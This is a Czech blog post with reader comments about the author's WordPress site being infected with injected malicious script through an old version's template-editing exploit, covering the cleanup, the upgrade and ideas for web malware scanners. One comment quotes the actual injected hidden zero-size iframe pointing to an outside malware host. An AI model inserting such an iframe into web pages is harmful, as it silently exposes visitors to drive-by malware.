Marigold chytil vira (nebo spíš malware)

Tak se mi zase něco s Marigoldem podařilo. Chytil jsem virus. Tedy abych byl přesný, Marigold.cz chytil virus. Nebo ještě přesněji malware, škodlivý script šířený tentokráte přes webové prostředí. Pokud jste navštívili Marigolda a měli jste starší verzi MSIE, začal browser bláznit. A to bylo ono.

Jak se to stalo? Vcelku jednoduše. Používám pro Marigolda WordPress, častý to terč útočníků. A bohužel v docela staré verzi 2.0.5, na kterou se vyrojilo pár exploitů, díky nimž bylo možné přes webové rozhraní změnit šablony i bez administrátorských práv. A tak se do patičky dostal i škodlivý javascript. Řešení je dvojí: rychlé bylo udělat CHMOD 644 na postižené soubory a editovat je ručně via FTP. Chyba postihuje uživatele, kteří kvůli svému pohodlí umožňují editaci šablon přes webové rozhraní. Změnou práv (nelze zapisovat do souboru přes web) se toto odstraní. Druhým krokem bude upgradovat na nejnovější WordPress 2.5.1, k čemuž ale sbírám zatím spíše odvahu, protože to znamená zazálhovat – a to je u Marigolda na hodinu stahování dat i v práci na rychlé lince. Jenže tam na to totálně není čas. Od té doby, co jsem si omylem uspěchaným updatem vymazal hromadu dat z Chronomagu jsem už opatrnější.

Google bude ještě chvíli na Marigolda reagovat podrážděně, ale už je to snad všechno opravené, takže jde o to, až to googlisti opět zvalidují jako normální web. Uvidím, jak jim to dlouho bude trvat.

Je to pro mne zajímavé memento, byť přišedší zrovna v blbou dobu, kdy je dost práce na jiných věcech. Tak především je zřejmé, že malware se stává stále častějším problémem, narážím na takto „hacknuté“ weby kolem sebe stále častěji. Navíc proti tomu existuje z hlediska webmastera špatná obrana, webmaster je většinou člověk mající aktuální verze prohlížeče i OS, do kterých se malware hůře boří. Naopak aktualizaci webslužeb rádi odbýváme, vím to podle sebe. Jak by také ne, aktualizovat WordPress chvíli chce, i když u posledních verzí už je to jen přepsání starých souborů novými. Chtělo by to automatickou aktualizaci. Ta u Wordpressu zatím funguje spíše jen pro pluginy a tak trochu poloautomaticky. Ale hezky. A do třetice, ukazuje se, že monokultura už není škodlivá jen pro operační systémy, ale i pro webové aplikace. Díra ve WordPressu je lépe zneužitelná, než díra v proprietárním CMS. Kam se přikloňí výhoda: k rychlým záplatám u Wordpressu se širokou základnou hackerů, nebo problematickému záplatování propietarit, které zajímají málokoho?

Co by bylo hezké? Nějaký webové scaner na malware. Zadáte adresu, zaplatíte paypalem, ono ji to sleduje, až se tam objeví malware, tak vám to napíše, co s tím udělat. Antivir pro webserver, řekl bych. Asi se časem nějaký objeví, proč by ne, je to díra na trhu. Stejně jako firewallscripty, které se snaží ošetřit nejčastější místa potenciálních průniků a slouží jako firewally pro webové aplikace. Možná jsem ho měl za 120 doláčů koupit. Ostatně, co si kdo o tom myslíte? Máte zkušenosti? Konkrétně třeba s Firewallscript.com?

A všem se omlouvám za ten malware.

Jak se vám líbil článek?
1 Star2 Stars3 Stars4 Stars5 Stars (hlasováno , průměr: 4,38)
Loading...

28 komentářů

  • Tak, update na WordPress 2.5.1 proveden. Tfuj, nebylo to easy, dvě a půl hodiny 🙁

  • nemas kopiu toho cervicka? uz som to riesilniekolkych ludi, naposledy vyuzival xss malware botnet asprox.

    ak si si ho niekde ulozil, posli mi ho trebars na mail, budem vdacny 😉

  • Gratuluju k upgradu. Jinak jsem poprvé v životě viděl ve FF varovnou hlášku. Pěkný. 🙂 Píšu z IE7, páč FF mě se nějak už nechce zatim pustit.

  • snazil som sa najst nejaky priamy kontakt na teba, aby som ta upozornil, ze stale mas na blogu infikovany odkaz. najdes ho na homage page a je to toto
    <iframe src=http://psp-info.cn/x/go.php?sid=2 width=0 height=0></iframe>

    urcite si to este vsetko poriadne prejdi

  • ehmo: díky, ten jsem už taky vyhodil. snad je čisto 🙂 neschovával jsem si nic… pryč s tím…

  • lukyn.v: K tomu ve Firefoxu slouží ten malý odkaz vpravo dole „Ignorovat toto upozorneni“, kterým se lze na stránku i přes varování dostat (ale objevuje se znovu pro každou další URL z daného webu).

  • Martine Hassmane, blbě jsem to definoval. O tom odkazu vim. Když jsem jej ale chtěl použít podruhé, abych se dostal na komentáře, tak se po kliknutí na ten malý odkaz nic nedělo. 🙁 Napadlo mě ještě pak vypnout bezpečnostní nastavení přímo ve FF, ale to už jsem nezkoušel. … (Firefox 3 RC1)

  • Heheh, byla jsem na tom podobně. 🙂 Taky nulový iframe (hacknuté 2.5) předstíral, že je wordpressí počítadlo. Přes Webmaster Tools jsem si Google doslova pozvala a byla jsem z těch ošklivých hooodně rychle vyřazena.

  • Jako vždy se ukazuje, že bohužel se Internet rychle mění v džungli, kde se za chvíli vyzná jen pár zasvěcených a Nova nás zase bude mít čím pořádně postrašit. 🙂 To bude moc hezký.

    A nebo to WordPress konečně dokope k tomu, aby dodělali automatické updaty. A pak se rychle našla nějaká potvora, co si s tím poradí a automaticky zamoří celý svět.

  • Mě na tom těší, že zafungovalo preventivní varování od Google. Normální uživatel není schopen poznat, co se děje a co m udělat (a dost dobře to po něm nikdo nemůže chtít).

  • veru, google pridal novu pomocku, ktora doplna informacie o infikovanom webe. pre marigold je to tu

  • Problém je, že automatické updaty nechtějí. Minulý rok jsem jim to v rámci projektu Google Summer of Code navrhoval a vybrali projekty úplně jiné, přitom tohle by mohlo ohromným způsobem zvýšit bezpečnost. Například u Firefoxu díky automatickým aktualizacím má 80 % jeho uživatelů aktuální verzi během tří dnů.

  • Zeptam se laicky-jak jednoduse zjistim, ze to potkalo i mne, kdyz nepouzivam stare prohlizece? Jedinym zpusobem je projit pouzitou sablonu vzhledu, jestli neni tam neni pridan nejaky nechteny odkaz?

  • S FF 3.0 RC1 se na tuto stránku nelze dostat, Ignorovat nefunguje!
    Na root i článek se s Ignorovat dostanu, na diskuzi ne.

    Error v FF 3 RC1

  • jen male upozorneni – myslim, ze uz neni pravda, ze neexistuje plnohodnotny upgrade plugin pro wordpress. pri poslednim updatu jsem pouzil tohle:

    http://techie-buzz.com/wordpress-plugins/wordpress-automatic-upgrade-plugin-update.html
    da se najit i pres ‚wordpress automatic upgrade plugin‘

    nebyly nejmensi problemy. plugin nejdriv deaktivuje vsechny bezici pluginy krome sebe sama, prepne stranku do maintenance modu, udela zalohu databaze a souboru, stahne z internetu novou verzi wp, rozbali, zaktivuje pluginy, a je to…

  • > až to googlisti opět zvalidují jako normální web.
    > Uvidím, jak jim to dlouho bude trvat.

    nechci zasívat pesimismus, ale já na tuhle validaci u dvou svých stránek čekám už čtyři a půl měsíce. A to jsem javascript odstranil hned a velmi brzo jsem přes Google webmaster tools požádal o přehodnocení.

  • problem s automatickymi updaty je ten, ze velmi casto hnedka oteviraji diru do systemu – cely system totiz musi byt zapisovatelny z webu. existuje par napadu, jak to resit – pres FTP, nicmene zatim jsem si nevsiml, ze by se do toho jakykoliv OSS CMS odvazil.

  • tak je to 1:1 – já první zasela optimismus a Ty jsi mi ho zneutralizoval…

  • Přiznám se že nejsem WebMaster a problematice nerozumím, ale:

    1. Nestačilo by udělat si kontrolní součty souborů (na vašem serveru) které jsou neměnné (nemají se měnit) a vždy je bleskově zkontrolovat, popřípadě nahradit změněné soubory záložními.
    2. Kdysi jsem navrhoval VirusTotal aby pro nás, uživatele, umožnily testovat přímo konkrétní objekt umístěný na Internetu (bez předchozího stahování do PC). Že by pak třeba mohli i zavést placenou službu včasného oznamování webmasterům a dodávat informace do webových scannerů antivirových programů. Zdá se že o to nebyl zájem. Zato nefunkční Google-Bad Ware, Web Security Guard, MS Phishing Filter, AVG Search-Shield (Exploit cosi). Všichni tihle fungují až je po všem a spíše škodí.

  • dnes (11. 6.2008) je marigold.cz opět zavirován :/ – screenshot:

  • mjkhl: a není tam něco napsáno v těch Virus Info? Mně v tý strýnce nic podezřelého zatím nevidno…

  • HTML/Infected.WebPage.Gen

    Description:
    A common attack against the web infrastructure can be the infection of harmless web pages. Some malware changes every HTML file stored on the disc and adds a link (very often an IFrame) to a site hosting malicious code. Other attacks can aim for the web servers and try to insert forwarding to the pages hosted there. The owner of these pages is advised to take them offline. Fix the hole (either on his own PC or on the server), check the pages for infections, clean them and go online again. Infected Web Pages often contain additional Iframe, Object or Script Tags. The Script Tags often contain encrypted Code.

    Version history:
    The following engine updates were released in order to enhance detection:

    • 7.04.01.62 ( 14/08/2007 )
    • 7.06.00.40 ( 07/12/2007 )
    • 7.06.00.84 ( 10/04/2008 )

  • ovsem hlasi mi to pouze na homepage, na tehle singe.php strance ne…

  • a nestačí dát v prohlížeči ctrl+f5, jestli to není kód z cache?

  • mno, nestaci – mel jsem po cerstve reinstalaci systemu, tkze zadne cache jsem jeste vytvorene nemel (ale byla to free verze Avira Antivir, tak nevim…) v kazdem pripade, druhy den uz to nehlasilo 🙂

  • opravdu tam něco bylo, odstranil jsem to